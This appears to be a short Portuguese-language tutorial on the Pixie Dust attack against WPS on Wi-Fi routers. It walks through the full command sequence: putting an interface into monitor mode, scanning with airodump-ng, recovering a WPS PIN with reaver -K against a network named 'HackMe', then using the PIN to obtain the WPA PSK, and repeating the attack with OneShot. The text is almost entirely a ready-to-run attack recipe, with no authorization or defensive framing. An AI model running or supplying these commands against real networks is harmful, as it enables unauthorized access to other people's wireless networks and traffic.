The Pixie Dust Attack

O Pixie Dust Attack é um método bem conhecido para explorar vulnerabilidades no protocolo WPS (Wi-Fi Protected Setup), usado para recuperar a chave pré-compartilhada (PSK) WPA/WPA2 de uma rede sem fio alvo.

Usando Reaver

  • Para executar um ataque Pixie Dust com Reaver, precisamos de uma interface de rede rodando em modo monitor. Podemos criar uma nova interface mon0e habilitar o modo monitor usando os seguintes comandos

iw dev wlan0 interface add mon0 type monitor

ifconfig mon0 up

iwconfig
  • Quando a interface estiver no modo monitor, procuramos redes Wi-Fi disponíveis com airodump-ng.

airodump-ng mon0 --wps
  • A saída revela uma rede WPS WiFi chamada HackMe. Podemos usar o Reaver para executar um ataque Pixie Dust contra ela, especificando a opção -K(ou ).--pixie-dust

reaver -K 1 -vvv -b 86:FC:9F:5D:67:4E -c 1 -i mon0
  • O ataque Pixie Dust foi bem-sucedido, e o PIN 32552273foi recuperado. Podemos usar esse PIN posteriormente para obter o PSK (Pre-Shared Key) para a rede WiFi.

reaver -b 86:FC:9F:5D:67:4E -c 1 -p 32552273 -i mon0

Usando Oneshot

  • Para executar um ataque Pixie Dust usando OneShot , novamente exigimos que nossa interface esteja no modo monitor. No entanto, antes de prosseguir, devemos excluir a mon0interface configurada anteriormente.

iw dev mon0 del
iwconfig
  • Agora, podemos usar o comando airmon-ngpara definir nossa wlan0interface no modo monitor.

airmon-ng start wlan0
  • Similar ao Reaver, o OneShot também inclui o argumento -K(ou --pixie-dust). Vamos aplicar essa opção e iniciar o ataque.

python3 /opt/OneShot/oneshot.py -b 86:FC:9F:5D:67:4E -i wlan0mon -K

Last updated